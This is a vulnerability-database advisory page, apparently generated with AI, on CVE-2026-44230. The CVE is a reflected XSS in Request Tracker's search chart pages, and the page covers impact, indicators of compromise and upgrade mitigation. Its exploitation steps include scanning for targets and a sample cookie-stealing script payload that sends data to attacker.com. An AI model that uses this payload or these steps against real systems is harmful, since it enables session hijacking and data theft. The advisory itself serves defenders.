CVE-2026-44230
Linux Debian Analyse et atténuation des vulnérabilités

Aperçu

CVE-2026-44230 is a reflected Cross-Site Scripting (XSS) vulnerability in Best Practical's RT (Request Tracker), an open-source enterprise issue and ticket tracking system. The vulnerability affects RT versions 5.0.4 up to (but not including) 5.0.10, and 6.0.0 up to (but not including) 6.0.3, specifically in the search results chart pages. It was published on May 20, 2026, and fixed in versions 5.0.10 and 6.0.3. The CVSS v3.1 base score is 6.1 (Medium) (GitHub Advisory, Red Hat Bugzilla).

Détails techniques

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting) and stems from insufficient sanitization of user-controlled URL parameters on search results chart pages in RT (GitHub Advisory). An attacker crafts a malicious URL containing an injected JavaScript payload that, when reflected back in the browser response without proper encoding, executes in the victim's browser context. Exploitation requires no privileges on the attacker's part but does require user interaction — specifically, an authenticated RT user must be induced to visit the crafted URL (GitHub Advisory). No public proof-of-concept exploit code has been identified at this time.

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript within the browser session of an authenticated RT user, potentially enabling session token theft, credential harvesting, unauthorized actions performed on behalf of the victim, or exfiltration of sensitive ticket and user data visible in the RT interface (GitHub Advisory). The scope is changed (S:C in CVSS), meaning the impact extends beyond the vulnerable component to the user's browser environment. Availability is not directly impacted, but confidentiality and integrity are both assessed as low-impact per the CVSS scoring (Red Hat Bugzilla).

Étapes d’exploitation

  1. Reconnaissance: Identify publicly accessible RT instances running versions 5.0.4–5.0.9 (5.x branch) or 6.0.0–6.0.2 (6.x branch) using web search, Shodan, or Censys.
  2. Identify vulnerable endpoint: Locate the search results chart page within RT (e.g., a URL path associated with ticket search chart views) that reflects URL parameters without proper sanitization.
  3. Craft malicious URL: Construct a URL targeting the vulnerable chart page parameter with an injected JavaScript payload, such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent encoded form.
  4. Deliver the payload: Send the crafted URL to an authenticated RT user via email, chat, or another social engineering channel, inducing them to click the link while logged into RT.
  5. Execute arbitrary JavaScript: When the victim visits the URL, the injected script executes in their browser session, enabling the attacker to steal session cookies, perform actions as the victim, or exfiltrate data visible in the RT interface (GitHub Advisory).

Indicateurs de compromis

  • Network: Outbound HTTP requests from a user's browser to unexpected external domains shortly after accessing RT search chart pages; unusual referrer headers in web server logs pointing to RT chart URLs with encoded script tags or JavaScript payloads in query parameters.
  • Logs: RT web server access logs showing requests to search results chart endpoints containing URL-encoded JavaScript (e.g., %3Cscript%3E, javascript:, onerror=, onload=) in query string parameters.
  • Browser/Session: Unexpected session invalidation or re-authentication prompts for RT users; reports from users of unexpected redirects or pop-ups when accessing RT search chart pages.

Atténuation et solutions de contournement

Best Practical has released patched versions that resolve this vulnerability: RT 5.0.10 for the 5.0.x branch and RT 6.0.3 for the 6.0.x branch. All users running affected versions should upgrade immediately (GitHub Advisory, RT 6.0.3 Release). No effective configuration-based workarounds exist; the advisory recommends avoiding following untrusted RT URLs as a precautionary measure. Additionally, deploying Content Security Policy (CSP) headers to restrict inline script execution can reduce the impact of XSS vulnerabilities as a defense-in-depth measure.

Réactions de la communauté

The vulnerability was reported by the RT maintainers (cbrandtbuffalo) via GitHub Security Advisories and is one of several security issues addressed in the RT 6.0.3 and 5.0.10 releases, which also fixed SQL injection, LDAP authentication bypass, CSRF, and other XSS variants (RT 6.0.3 Release). The Ubuntu security team issued advisory USN-8506-1 covering this and related RT vulnerabilities. Coverage has been limited to vulnerability tracking databases and Linux distribution security channels, with no notable broader media or social media discussion identified.

Ressources additionnelles


SourceCe rapport a été généré à l’aide de l’IA

Apparenté Linux Debian Vulnérabilités:

Identifiant CVE

Sévérité

Score

Technologies

Nom du composant

Exploit CISA KEV

A corrigé

Date de publication

CVE-2026-44231CRITICAL9.1
  • Linux Debian logoLinux Debian
  • request-tracker4
NonOuiJul 20, 2026
CVE-2026-44230MEDIUM6.1
  • Linux Debian logoLinux Debian
  • request-tracker5
NonOuiJul 20, 2026
CVE-2026-44229MEDIUM5.4
  • Linux Debian logoLinux Debian
  • request-tracker4
NonOuiJul 20, 2026
CVE-2026-64194NONEN/A
  • Linux Debian logoLinux Debian
  • libnet-dns-perl
NonNonJul 20, 2026
CVE-2026-64193NONEN/A
  • Linux Debian logoLinux Debian
  • libnet-dns-perl
NonNonJul 20, 2026

Évaluation gratuite des vulnérabilités

Évaluez votre posture de sécurité dans le cloud

Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.

Demander une évaluation

Obtenez une démo personnalisée

Prêt(e) à voir Wiz en action ?

"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
David EstlickRSSI
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
Adam FletcherChef du service de sécurité
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."
Greg PoniatowskiResponsable de la gestion des menaces et des vulnérabilités